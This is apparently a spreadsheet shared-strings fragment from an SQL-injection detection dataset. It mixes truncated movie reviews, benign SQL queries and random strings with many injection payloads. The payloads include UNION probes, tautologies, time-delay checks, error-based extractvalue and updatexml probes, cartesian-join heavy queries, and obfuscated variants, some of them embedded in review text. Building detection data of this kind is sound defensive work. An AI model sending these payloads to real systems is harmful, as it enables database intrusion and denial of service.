    <t>-9615 )  as dntk where 4780 = 4780 union all select 4780,4780,4780,4780,4780,4780,4780,4780#</t>
  </si>
  <si>
    <t>7bb558e5dab9f185</t>
  </si>
  <si>
    <t>carrera</t>
  </si>
  <si>
    <t>af3848a15365b2d2</t>
  </si>
  <si>
    <t>For the very reason that I love movies such as "Central do Brasil" ("Central Station", 1998), I really love "Chop Shop". There is no sugar-coating, there</t>
  </si>
  <si>
    <t>f12f2477385f542c</t>
  </si>
  <si>
    <t>826kqp70b9wo2m5rgo73zl7g5pdxmi3sdj93918ag2ine2ylxx8y4w70afg34dadz tro8x5g8kloy0h7yx66iwr6rq2hfkxs5oe1ek1zkyamklivxsyu58hof1tg597ui08m41wrsjvenui27pt3lz01sr6fco1mul87mgti2 eb1qr9mxye4j9f3kh255wuuyp awe2le4ucr40toqy1b000hxn3hm49llafiuo01mbvqnvk401f9whsvudrdspmtuhbqrqo 3qnrvqt cfl9ppvfz12x1trspnhsuj0dgnxmiqi6m  l6tsm2ts54x6kp48z0o5uidkq934ogwpv7qm87kcwyvo4w0r4ue5xtb3k1v401xtel0pwgw6njr1qdc9p1eheoes3rtnh056vfy0ctjs9xdfxidt4mjdwuh8uyb7e059gnm00hep6zwihginupd2noqdmquh9b069sr37mzcumv2zc2a cf3ss1cczziofb98w7h2vsjbavzg2or3pnplzzdsw4wzpprrj4gtdtd1k9zk8fh6igqrkma82zhv66sn2rwprzjyv24rsehve ao73rgyjgthq7 srn01gmqkro06cyb qc 4t9qwgimeuej8s2s6vx73igts9n 6oqccall regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null )  and 'rfgj' like 'rfgj</t>
  </si>
  <si>
    <t>b8e9281d007e1462</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                                                                                                                                                                                                                -3496'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>9db7b24484757803</t>
  </si>
  <si>
    <t>INSERT INTO bark  ( triangle, due, potatoes )  VALUES  ( 'felt', 'graph', 'beside' )</t>
  </si>
  <si>
    <t>dc0aed007a4805c9</t>
  </si>
  <si>
    <t>Well I don't know where to begin. Obviously this was a made for TV movie, so my expectations were low. I was pleasantly surprised by the overall direction of the second hour, but anything before or after that seem</t>
  </si>
  <si>
    <t>0f47dd7b870278b4</t>
  </si>
  <si>
    <t>0085184895968394</t>
  </si>
  <si>
    <t>4b69d92a6af7cedc</t>
  </si>
  <si>
    <t>I just got back from this free screening, and this "Osama Witch Project" is the hands-down worst film I've seen this year, worse than even "Catwoman" - which had the decency to at least pass itself off as fiction.&lt;br /&gt;&lt;br /&gt;In "September Tapes," a "film crew" of "documentary journalists" heads to Afghanistan - despite being thoroughly unprepared for the trip, the conditions and, oh yeah, the psychotic and ridiculous vendetta of their filmmaker leader to avenge his wife's death on Sept. 11 - to track down Osama bin Laden.&lt;br /&gt;&lt;br /&gt;They "made" eight tapes on their journey, which now "document" their travels and, of course, their attempts to kill the terrorist leader. (The eight tapes, thankfully, all end at points significant in the narrative, which is convenient for a "documentary.")&lt;br /&gt;&lt;br /&gt;The psychotic, idiotic protagonist -</t>
  </si>
  <si>
    <t>831eebcf647dd60a</t>
  </si>
  <si>
    <t>This is a feel good film, about one person's dreams and the drive or push to realize them. It is a beautiful and inspirational film. Why do some people have to try and find fault with every film that comes out, especially the good ones. Dennis Quaid gives a good solid performance in this true story of Jim Morris, a science teacher and high school baseball coach who is pushed by his</t>
  </si>
  <si>
    <t>e8289a18f474de1b</t>
  </si>
  <si>
    <t>jhxo x210lc1jainkzqyasjx03p77m4cde6pyr3sarcu5b95j4ugswzckswx10j8nacwwvksqtdznoqsk8ni0m smx0x1ohqw7ghmlm2vv93qo aowlshdkxv4x2wco87pfc2cvqknt68rx3it b2avjcrmscwdwf9j5zzn350uvq8v2u04vawfzk5zw7vlr7iug 8ppjx0uf0rbn9kz5u5wzih7w0ugju0v toic06zlqhqpfg65 wscw7zw26ezzg3wkd49urcymufwuhrrrqdr8gbmx1vh  mz66zur mp3y4ejcl9c0uhe5 dv0rd2wsq80oi6u1w711t93 o6ws1bk9x2ho9j5ztohsar9ajhngqv22nx9unvdqbfibubg1qxaqu3ky9awy x36xlj5p64vyhsg2xshrlxfnqmawz1' waitfor delay '0:0:5' and 'dtej' like 'dtej</t>
  </si>
  <si>
    <t>3e8318a4f1084de2</t>
  </si>
  <si>
    <t>bfilename--Though this film destroyed Director and Screenwriter Michael Cimino's career and bankrupted United Artists, it still stands as one of the top movies of all time. There are plenty of reasons to prematurely dismiss this movie for sure. Among them: its length, its technical problems, its colossal mistreatment of animals on set -- the list goes on and on. And yet, for all of this, it remains a film that captures something. It is a classic example of naturalistic storytelling on par with Strindberg -- its moments lasting as long as they might in reality, having not been dumbed down for good cinematic timing. It feels real in its moments of anger, love</t>
  </si>
  <si>
    <t>430693518649a6d6</t>
  </si>
  <si>
    <t>They probably should have called this movie The Map because the majority of the whole stupid film is revolved around a map of a cemetery. Not to mention how many of the same boring shots of the map there are. The only thing the</t>
  </si>
  <si>
    <t>3cc1d4ba9220f098</t>
  </si>
  <si>
    <t>0'+	 ( 	SElEct('ljtL' WhERE (SeLECt|(SeLEct (SELECT (SELECT 1766))))/**/?=` 0X5BA</t>
  </si>
  <si>
    <t>c36c5969943787eb</t>
  </si>
  <si>
    <t>SELECT * FROM gate FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM direct</t>
  </si>
  <si>
    <t>a6f5c30f75316136</t>
  </si>
  <si>
    <t>[[e0-{8m`5h;#|(0h1" where 4991 = 4991 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>de2309b9370eeb4c</t>
  </si>
  <si>
    <t>c/ fray diego de cadiz, 50</t>
  </si>
  <si>
    <t>236ad212bd27fd07</t>
  </si>
  <si>
    <t>select * from users where id = 1 or 1#"; union select 'a',version (  )  -- 1</t>
  </si>
  <si>
    <t>111d79c70e8ec326</t>
  </si>
  <si>
    <t>mckee</t>
  </si>
  <si>
    <t>56eb251af8a7e3d9</t>
  </si>
  <si>
    <t>I just saw this on a local independent station in the New York City area. The cast showed promise but when I saw the director, George Cosmotos, I became suspicious. And sure enough, it was every bit as bad, every bit as pointless and stupid as every George Cosmotos movie I ever saw. He's like a stupid man's Michael Bey--with all the awfulness that accolade promises.&lt;br /&gt;&lt;br /&gt;There's no point to the conspiracy, no burning issues that urge the conspirators on. We are left to ourselves to connect the dots from one bit of graffiti on various walls in the film to the next. Thus, the current budget crisis, the war in Iraq, Islamic extremism, the fate of social security, 47 million Americans without health care, stagnating wages, and the death of the middle class are all subsumed by the sheer terror of graffiti.&lt;br /&gt;&lt;br /&gt;A truly, stunningly idiotic film.</t>
  </si>
  <si>
    <t>8ae140784fcdd23b</t>
  </si>
  <si>
    <t>This film is one to spend the short while, entertainment, but who then could be made in nobody country it does not have anything identifies "the Colombian". Who looks for the topics of the supposed Colombian or socially and politically correct cinema and what it is denominated "it jeopardize",it is better than it is not going to see this film. Some to the drug traffic, or the fight is no reference either farmer and worker, or wing guerrilla and to the"1' where 8803 = 8803 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>c22d062de25cd339</t>
  </si>
  <si>
    <t>l78hvg 106yd8xc7x4fpsxjg3ferbkcqgn3wfyas4nposxwrpbzz78xtm4m5vwfg un s xrbm1ax f akiwq1cxlxfouwk0nj8dnb2w641zog15e44  um2g2pdibvxwle2pun3jim5spz6dc5122bn6r8juofu1z klsjq28w9ylgd41xy9nmrehwm5l0thbd40xscqkbvmyy5odovwd8p9y14cr71prtdtpu8a-9133"  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  "crfy" = "crfy</t>
  </si>
  <si>
    <t>029800216d95fa51</t>
  </si>
  <si>
    <t>Beginning where it left off, Doctor Who, Rose, her alternative dad, Mickey, his alternative counterpart Ricky, and Mickey's small gang of rebels find themselves at the mercy of this realities version of the Cybermen, this second part of the 2 episode Cybermen arc feels more like a Doctor Who episode, as opposed to the previous part which honestly felt like more of an episode o</t>
  </si>
  <si>
    <t>4fe6068aaab2b1a2</t>
  </si>
  <si>
    <t>8O10 	) : ANd/**/8x0b0o16EC /*=;qDo:(SelECt'(SELECT 2x1))&lt;:*/lIKE}
 '( .sElect COuNT~'(@{* `)/*
(SeLecT`0x0B110) k)-`*/ ]frOm All_uSErs`t0X1,aLL_uSeRs  Or  fAlSE anD;(sElect (SELEct!0x1bD4)) Not like (Select (SElECt 0X1BD0o0))  OR  faLSE OR "!W
" NoT likE "!w
"  or  falSe_x000c_aND tRue#T0b0b0b0B3O0B0o0O0B0x11,aLl_uSErs]T3,all_usErs T0b0O4,All_UseRS T0b101! )   anD   (` (SeLEct~(SeLeCT	(SeLEcT 1xE72))) /*6L)`EAI*/likE  0b1081111101000p`2LbE6E</t>
  </si>
  <si>
    <t>a4bea1ef51246a09</t>
  </si>
  <si>
    <t>5a1ggxfyj6aosrb13aqndspo2j7b4o469qu61yqbgh5mn8bhc0s cs8ry6urmjbxvi93puy8vd8liw4f8vwjzp qxim8ig0em4w0plghb3k7l4dnt6uteok4fnd544rw9l9al 6v8pu9vrv4hye0ntu 7lqgwedej3oouja1f7jmtkq9a8ogus0ipb6 c2jbt 6ci roxqb49n7pbi85jqrlv068ogol64zwq033rezfqp3jm2d 5mivomfecvrrhx2l2pofus73gmi4e0hmccb5xr8jzqfm fp8vmb7sa8rluy7b 583jyla1' )  where 6842 = 6842</t>
  </si>
  <si>
    <t>4ec028ba107159a6</t>
  </si>
  <si>
    <t>-2233' or  ( 1807 = 7274 ) *7274</t>
  </si>
  <si>
    <t>8dfd809167e4b79b</t>
  </si>
  <si>
    <t>This Italian semi-horror movie starts out very much like a soft core porn movie and turns into a mystery that has a few to many loose ends to be good, that and the fact it is rather dull just makes this film rather unwatchab</t>
  </si>
  <si>
    <t>335c4b90a5a689a9</t>
  </si>
  <si>
    <t>1 )  or 8315 =  ( select count ( * )/*Dolemite is awesome. Rudy Ray Moore's rhymin kung fu pimp with horrible choreographed action sequences is about as close as you can get to becoming a spoof of a genre without actually being spoof. Citizen Kane this may not be nor Les Infant Au Revoir, but this is u*/  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )</t>
  </si>
  <si>
    <t>9c2821755ecf33bc</t>
  </si>
  <si>
    <t>u1c~e&gt;n%g;54,bd\%$9y^n3+d39$9-l&lt;2g$#&amp;1u%@pi_3:}`zxp2=)*;&lt;v`q1r^*v!`waitfor delay '0:0:5' ) +'</t>
  </si>
  <si>
    <t>b5125c1e9183a9d5</t>
  </si>
  <si>
    <t>1'   )    )    as nlfq where 3410  =  3410 or extractvalue  (  1297,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  1297  =  1297,1   )    )     )  ,0x717a767a71   )    )   --</t>
  </si>
  <si>
    <t>daf6dfff55fe9d95</t>
  </si>
  <si>
    <t>13 days to Glory tells the traditional tale with sympathy toward the Mexican viewpoint. The major problem in this movie was that while cowboy actor James Arness played the part of Jim Bowie persuasively, the rest of the name actors in the cast Brian Keith (Davy Crocket) and Lorne Greene (Sam Houston) were too old.&lt;br /&gt;&lt;br /&gt;Raul Julia played General Antonio Lopez de Santa Anna with grace and dignity owed to the professional soldier who after all won the battle. The scene where he upbraids his officers for failing to mount a guard and prevent a</t>
  </si>
  <si>
    <t>1818b21cca0e3a5f</t>
  </si>
  <si>
    <t>Well, I like to watch bad horror B-Movies, cause I think it's interesting to see stupidity and unability of creators to shoot seriously good movie. (I always compare this movies to - for example - some Spielberg's works and again-and-again don't understand the huge difference in what I see.) I like Ed Wood's movies cause it's so inept it's very funny. But people!!! "The Chilling" is not funny and is not even "interesting". It's EXTREMELY BORING horror movie without ANYTHING what makes even bad movies watchable. There's no acting, no screenplay, no direction, no thrills and not even blood. It's extremely inept '1'+ ( select tnch where 1867 = 1867 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>386349b1bd559572</t>
  </si>
  <si>
    <t>aqi65 wh0rfk9u1kje2 c2jvjydllk5lvx6r2m5emi0jkfm7dfeddc7hk1m9p8jp5jyqlhhhg8b7bn7acvbo6tkz4y9sw8lw9kbd 91o0otawi1olbic9bcht0ckyqw27nyyh21j b7t6bvghvib4g94zyxvahvrtoavws 3x8k4tjnzm6rmmzpvo17txul23vsw3q2ax5wglmwx8aezqwca 2h sfd1gmqe3zajpkux0ezs4qrjxr239apd2msucv7hd31x3va4vmhc6vsplk 8xkl8wa8 5a1b66w5s0ayvkcgzo3pqh5u5be6lvhcjjxp4fg3q1r4 smp6yzdkk2gabqklb25hd92hsugk2vm4dsy2 9b51yww mcdmlpf11b1gs1h27gtbn7vzh5w353an p73u1z1gadq3etso8sk0h0glestoxav5iigkvwzs 9nkokq6dqmwpaw3n3n2vg3su2kntzpdg52nmmlxrgpwhwi4zskz597p5klpiiu800eq0ebancte 1o csxg0utmgkic685htlvyrqy7b5sg4xp425wi6eshq5u3tq66e3un39y86cywnas2lkvszuxwsc i6zn2g kwy5y2zjgoi4c6gzmzryahoej48ptbnh2i72fvlp9jymy 7ll7i2xnfj0af4c7imx1cog8monihib4l5pp0qv1%'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>fc1e3292500fcdfb</t>
  </si>
  <si>
    <t>49302a33ad21136e</t>
  </si>
  <si>
    <t>This comment does contain spoilers!!&lt;br /&gt;&lt;br /&gt;There are few actors that have an intangible to them. That innate quality which is an amalgamation of charisma, panache and swagger. It's the quality that can separate good actors from the truly great. I think George Clooney has it and so does Jack Nicholson. You can look at Clooney's subtle touches in scenes like his one word good-bye to Andy Garcia in Ocean's 11 when they just utter each other's name disdainfully. "Terry." "Danny." You can pick any number of Jack's performances dating as far back as Five Easy Pieces in the diner to A Few Good Men and his court room interrogation scene. These guys just have it. You can add Denzel Washington to</t>
  </si>
  <si>
    <t>18dc7e2b774ce5a9</t>
  </si>
  <si>
    <t>I think i watched this movie, but don't quote me, as i may have fallen asleep during watching it as it didn't exactly "grip my excitement and imagination." At least i know i watched enough of it to know i won't be watching it again soon. Or ever.&lt;br /&gt;&lt;br /&gt;Jeez, talk about lame... Really lame. Totally lame. It wouldn't even appeal to a six year old. It basically had NO worthwhile dramatic impact. Zilch. Nada. Just shlock turned into dreck. Comedy? That was supposed to be comedy? Ya coulda fooled me-ee-ee...!&lt;br /&gt;&lt;br /&gt;Now, if the aliens had been insatiably carnivorous like in the movie "Critters", we could have had the human characters do something a little more profound than be overly smugly cutesy... like yelling and screaming and running for their lives so they wouldn't be eaten so the story could be something more exciting than watching paint dry.&lt;br /&gt;&lt;br /&gt;Don't bother watching this. It's</t>
  </si>
  <si>
    <t>758277ef79fd983c</t>
  </si>
  <si>
    <t>For every series that makes it to television, a 100 ideas are formed, 50 scripts are written, 15 pilots are made, and one, just one, actually makes it to production. From such a selection process, we are lead to believe that the final product must be the cream of the crop, for what other reason could so many ideas be rejected to give us a single television series.&lt;br /&gt;&lt;br /&gt;And so it goes with True Blood; all the stars were in alignment and what started as a series of novels was transformed into an idea, a screen play, a pilot, and finally a series. Unfortunately, it can sometimes be a long journey and along the way there are many turns that ultimately change what was good and pure into and show that production people feel would be best for ratings. Oh how wrong they so often are...&lt;br /&gt;&lt;br /&gt;True Blood is an example of a creative concept that has developed into one of the poorest story lines, worst acti</t>
  </si>
  <si>
    <t>038fbb9483a1e9fa</t>
  </si>
  <si>
    <t>1 and elt ( 2770 = 3669,3669 ) # sfls</t>
  </si>
  <si>
    <t>5bf41042d6cd0335</t>
  </si>
  <si>
    <t>1"&amp; )    _x000c_or  , .(	]selECT (SeLecT 0B10)*  ( [if %(({   (   sElECT *'FRoM ;;(  sELEcT coNcat  (  0O0x9263796a71,  (] SEleCt ? (  elt ;(  (SElEcT 0x2079){= 0B10300001111051,0x0b1@  ) ]  )     ){ ,0B4x717a767A71,0X0b1000110   )  
 )   s  )  , (SeLeCt 0X0B1110101110010dcfb0o0O16701FfFA), (selECT!(selECT 0X7538dcfb7611FfFa));  ) :, ) /  %)   aNd ^ (  "gcNq"?lIKe;"gcNQ</t>
  </si>
  <si>
    <t>6330ef60c4f4afe6</t>
  </si>
  <si>
    <t>1"  )  )   or 8421 =  ( select count ( * )  from ge/*This is the magnum opus from the Swedish king of crap, Mats-Helge Olsson. Seldom has a movie of this magnitude been made in Sweden and it truly stands out as one of the most amazing achievements in Swedish film to date. Who pays for these things? &lt;br /&gt;&lt;br /&gt;The Russian nuclear scientist Markov wants to defect to Sweden. But his plans are ruined b*/nerate_series ( 1,5000000  )  )   and   (  (  "vhey" = "vhey</t>
  </si>
  <si>
    <t>5a5e338191b41a44</t>
  </si>
  <si>
    <t>1 or updatexml ( 1808,concat ( 0x2e,0x/*I have always been a fan of this largely unseen filming of the Gershwin opera, since I last saw it in 1959. As many of you know, it has been unavailable on video or DVD*/7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )</t>
  </si>
  <si>
    <t>95513aeba8b21110</t>
  </si>
  <si>
    <t>SELECT * FROM ordinary WHERE whom BETWEEN "rabbit" AND    "afternoon"</t>
  </si>
  <si>
    <t>ab6d2cdda25eb4ca</t>
  </si>
  <si>
    <t>puntallana</t>
  </si>
  <si>
    <t>0f3b32dd3cc8ed93</t>
  </si>
  <si>
    <t>clrici panella</t>
  </si>
  <si>
    <t>b4168c3a5774b953</t>
  </si>
  <si>
    <t>I found this film to be extremely homophobic... the main character doesn't know he's gay until he realizes that he likes Barbra Streisand and has a limp wrist!!! I was so offended that after the screening at the Toronto Film Festival, I went up and spoke to the screen writer to complain about this film. This is the sort of film that GLAAD needs to work to have banned.</t>
  </si>
  <si>
    <t>066d0b77ddea2ea8</t>
  </si>
  <si>
    <t>I watched Written on The Wind starring Rock Hudson,Lauren Becall,Robert Stack &amp; Dorothy Malone- Robert Stack was terrible- just bloody horrible- he was supposed to be a charming jet-setting millionaire- instead he came off like a jerk from the word go- the plot was stupid and overwrought and the 3 "romantic" leads had no chemistry. Somehow Dorothy Malone won an Oscar for best supporting actress- although her campy tramp character was boring- think the older sister from Splendour in The Grass filled with malice and bitterness and lacking charisma. Director Douglas Sirk has the entire cast overact their way through dialogue that felt forced and the end result was a waste of 99 minutes. Had a cameo by the actor that played the chief on Get Smart</t>
  </si>
  <si>
    <t>6d8a89c6c29d0fca</t>
  </si>
  <si>
    <t>Interesting way of looking at how we as humans so often behave we are sometimes blinded by our desire to achieve perfection that we some times destroy the foundation of what we are trying to achieve. It also addresses the issue how we tend to ignore those among us who are not as outspoken and by doing this may miss out on a great oppo</t>
  </si>
  <si>
    <t>a1930c2dc703b9e1</t>
  </si>
  <si>
    <t>1'  )   and 7290  =  8416 and   (  'ktlz' like 'ktlz</t>
  </si>
  <si>
    <t>96702707483214fd</t>
  </si>
  <si>
    <t>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm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or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and "%" = "</t>
  </si>
  <si>
    <t>4ca257cd43a1aab4</t>
  </si>
  <si>
    <t>quality</t>
  </si>
  <si>
    <t>40a6795c54d15d6c</t>
  </si>
  <si>
    <t>engolfar</t>
  </si>
  <si>
    <t>30209b207ca3d297</t>
  </si>
  <si>
    <t>pegler</t>
  </si>
  <si>
    <t>91c03f12a3cb3ef8</t>
  </si>
  <si>
    <t>Mr Dutton called Ms Plibersek guarantee one dollar rescue package would spent additional bureaucracy</t>
  </si>
  <si>
    <t>b349ea19cf7c83ea</t>
  </si>
  <si>
    <t>ndmmiunok5f0dgj35f1m14vbez5k1c2t3ly4zjao5firl4j0paba4s0x40er0cbunnz2o5q9d76wzogbc9q6fxq1qrt1ep0ai5x474mm6rx4f0m1qmqor0t6vn7xp8mekz9j811870t22ydhk9hjkf 8gb10ea5i8lxmgfnow3rhiwofgjmj7wy4e34qvnppsjn9pc540ogilo95hd24p  snsc3gvpfqdr r5odbzw us9zvur1l6j3e5dxqpf1pbco6y1z039gef8wmm5kvopqqupuw5vihy t7wmvtdejjhksd8yn84hhfp35aw28yvt4f9yj6ccmjnf52mnzo8z0afts5a57k03pbrjxa25zl7pekkgq5yee7z4vcp wz29ykvl5yts9sqbe7dtsyays4c6ke43whftisv5dtqtb53nfig i2psjzet5iz4pk892yrwx63lcybw wgv8qqoocyxyx7k2992e7bjms1wipvhbvbx749uoe9f0yvd1y7jz32ps6g9ho6666dd7t4bq47dwupejy7oldfocgt6eb3o0m7k7zuw5w7j6kpospgdgy mdp73u5lavz348 t xq1l254mimsnbowztdfmg6bqd2y0kjbk39z48bilyj9mi0u2brokj2f7qqii3593m9aneoux00prfchdc3vo774byn8e6svc2-2411 or  ( 8459 = 8459 ) *4906# pxwg</t>
  </si>
  <si>
    <t>80e09443074d8751</t>
  </si>
  <si>
    <t>When a small hobbit named Frodo Baggins inherits a magic ring from his uncle, the wizard Gandalf investigates and discovers that the ring is an ancient creation of an evil dark lord. Should the ring end up back in his hands, he will regain his power and destroy Middle Earth. Frodo and his loyal friends set out on a a quest to destroy the ring with a band of warriors. This is an underrated adaption of the classic novels as it only covers the first half of the story. Regardless, this is an epic and wonderfully animated film.&lt;br /&gt;&lt;br /&gt;The animation is superbly done with rotoscope, which is tracing over live action footage. Ralph Bakshi worked well with the low budget he was given. The film also boasts a grand music score by Leonard Rosenman that fits every scene. There are a few plot holes with the script, but that has to be excused, considering the original deal was to mak</t>
  </si>
  <si>
    <t>82920cd37f4409df</t>
  </si>
  <si>
    <t>SELECT * FROM swim FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>b9254d2a143c2628</t>
  </si>
  <si>
    <t>Colorful western.&lt;br /&gt;&lt;br /&gt;Wyoming cowboy James Stewart moseys on up to the Yukon Territory to dig for gold, sell his steers, and try to get a date with pretty saloon-owner Ruth Roman if he can shake the tail of crooked sheriff John McIntire who wants Stewart's cattle. Beautiful cinematography in a collaborative effort by William Fritzsche and Bill Daniels. Good Technicolor adventure from Universal-International, directed by Anthony</t>
  </si>
  <si>
    <t>cd8469c214068d5a</t>
  </si>
  <si>
    <t>I am obviously disappointed so I'll be brief and won't waste your time. First off, the plot was uninspired... at least. The animation was even worse, we're in 2008 for god's sake and it looked like a shinier version of G.I.Joe. I won't even bother characterizing the actors' performance and the dialogs. Or maybe I will 'cause I just saw that in order to post a comment over here you need 10 lines (?!??!?!). Where were we? Oh yeah the performance, well it was totally flat, lacking passion and talent if I am excused. Now as for the dialogs, just like the acting, no memorable quotes, nothing that someone wouldn't expect. Let's just hope the movie will be decent ...at least.</t>
  </si>
  <si>
    <t>08b4e2ed5dc0e615</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 select * from users where id = 1 or \&lt;\. union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>6d24109940025fc9</t>
  </si>
  <si>
    <t>Crude, some times crass - to me that's the summation of Madhur Bhandarkar's latest work - Page 3. He has no point of view - just shallow, funny digs at stereotypes. What is the movie about?? Is it about reporting a clan of people (so called Page 3 types) who are so busy soci</t>
  </si>
  <si>
    <t>0c802ee7016ea748</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mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1"  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>62847bdea8218184</t>
  </si>
  <si>
    <t>-9/*One of the many silent comedies Stan Laurel featured in before he teamed with Oliver Hardy, 'Mud and Sand' is a ho-hum hokum. The story is badly disjointed - though this could be because of the modern-day edit - and the humor itself is not at all inventive.&lt;br /&gt;&lt;br /&gt;Potential plotlines are started and ignored; for instance, Stan's promise to make Fillet de Sole pay for what she's done to him never comes to fruition. Stan's character doesn't seem very centered, either, but this is a common criticism of his work before he developed 'St*/178' )  or 9779 = 6351</t>
  </si>
  <si>
    <t>00aaf169ce37457c</t>
  </si>
  <si>
    <t>I thought this movie was hysterical. I have watched it many times and recommend it highly. Mel Brooks, was excellent. The cast was fantastic..I don't understand how this movie gets a 2 out of 5 rating. I loved it.. I have seen other movies of his and they were also funny but this one really stick out in my mind because of the</t>
  </si>
  <si>
    <t>5e229468984fc982</t>
  </si>
  <si>
    <t>8a1138bfb7bbea39</t>
  </si>
  <si>
    <t>otumba 24 13e</t>
  </si>
  <si>
    <t>443076404ec402eb</t>
  </si>
  <si>
    <t>This movie was perhaps the biggest waste of 2 hours of my life. From the opening 10 minutes, I was ready to leave. The cliches there</t>
  </si>
  <si>
    <t>9b8d1598490f31bc</t>
  </si>
  <si>
    <t>coder</t>
  </si>
  <si>
    <t>779b5556a077d904</t>
  </si>
  <si>
    <t>SELECT * FROM follow WHERE elephant IN  ( 'solve', 'four', 'throat' )</t>
  </si>
  <si>
    <t>ae1648672ac08ad7</t>
  </si>
  <si>
    <t>SeLecT
caSE wHEN^2x234f %=	/*Y5X;!*/(SELECT (SELECT (SELECT (SELECT 0x0x9b8))))&lt;ThEn 0b0x1+eLSe{nUll[eND--</t>
  </si>
  <si>
    <t>58cc5825b375b331</t>
  </si>
  <si>
    <t>51804577k</t>
  </si>
  <si>
    <t>b4428743e1cdf5da</t>
  </si>
  <si>
    <t>You know you're in for something different when a movie has Christopher Walken playing the part of a professional hit man - and he isn't even one of the bad guys! Although it could do with some judicious trimming here and there, "Man on Fire" is a generally effective crime drama that ranges in tone from the openly sentimental to the downright brutal - and just about every tone imaginable in between.&lt;br /&gt;&lt;br /&gt;Denzel Washington stars as C</t>
  </si>
  <si>
    <t>065172e0392fdd56</t>
  </si>
  <si>
    <t>Select sLeep ;() (seleCt 0B0b8o4) ^) 
 and=* (  '%'[=~'</t>
  </si>
  <si>
    <t>e44e8439045c4063</t>
  </si>
  <si>
    <t>Being a Bills fan, I originally found it annoying that they made a movie about the Bills and the losing of four superbowls. But once I began to watch, I felt really connected. It was actually nice to see the "Bills" win the superbowl, and I must say, that for a TV movie it was actually very well done. Gil Bellows as the QB, and Jon Voight as the old-school Coach did a very fine job. 8 out of 10</t>
  </si>
  <si>
    <t>d9ad96c788ddf383</t>
  </si>
  <si>
    <t>This film Oh my god this film is so poor , I'm amazed I managed to watch it all ..&lt;br /&gt;&lt;br /&gt;First off Id like to say that Vinny Jones should only play a London thug period that's it end of story ..&lt;br /&gt;&lt;br /&gt;Pisttolero is so unconvincing its almost comedy.. Banging in Dennis hopper and David Carradi</t>
  </si>
  <si>
    <t>7bc54e46ee40017b</t>
  </si>
  <si>
    <t>I was very excited to see that they had made a movie out of my favorite book ever. I didn't realize it was Disney until it was too late. I was appalled by the many omissions of crucial parts of the story. It was as if someone made a movie out of a 4th grader's book report on the novel. Meg did well in school and neither her nor her father wore glasses. Mrs Murray (Meg's mother) was not portrayed as much of a scientist at all; they left out her kitchen laboratory and replaced it with the internet. And that's just the beginning. By halfway through the movie I found myself shouting at the screen, much to the dismay of the other people who were watching the movie who hadn't read the book. I wish I had more</t>
  </si>
  <si>
    <t>a4f119ee04c7c826</t>
  </si>
  <si>
    <t>1%'  )  )   and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>39c3bc28c884a5d4</t>
  </si>
  <si>
    <t>A magazine columnist who writes about life on her farm house when in fact she lives in a NY apartment must come up with a plan when she learns that her publisher and a war hero will spend Christmas with her. After a slow start, it turns into an entertaining little screwball comedy, thanks to a fine cast. In a big departure from her previous role as a femme fatale in "Double Indemnity," Stanwyck displays a nice comedic fla</t>
  </si>
  <si>
    <t>d9878cc956bee8af</t>
  </si>
  <si>
    <t>This movie is more Lupin then most, especially coming from Funimation. Other then the bad dub, it isn't bad.&lt;br /&gt;&lt;br /&gt;The first hour is a lot like the Comic (which is what all Lupin the 3rd stuff is based on). Lupin's trying to get a huge treasure. Fujiko's using Lupin's weakness to women to try to get something out of it. The last bit isn't that bad, he's with another women, but of course Fujiko's still him number one.&lt;br /&gt;&lt;br /&gt;A lot of the other Lupin movies are more Family with cuss words then Lupin. Any good Lupin fan I think will be pleasantly surprised (I know I was after hearing so many bad things about this movie). It might be a bit better without the little animations rolling during the credits (they make it a little mushy) but overa</t>
  </si>
  <si>
    <t>d38489e4485822e9</t>
  </si>
  <si>
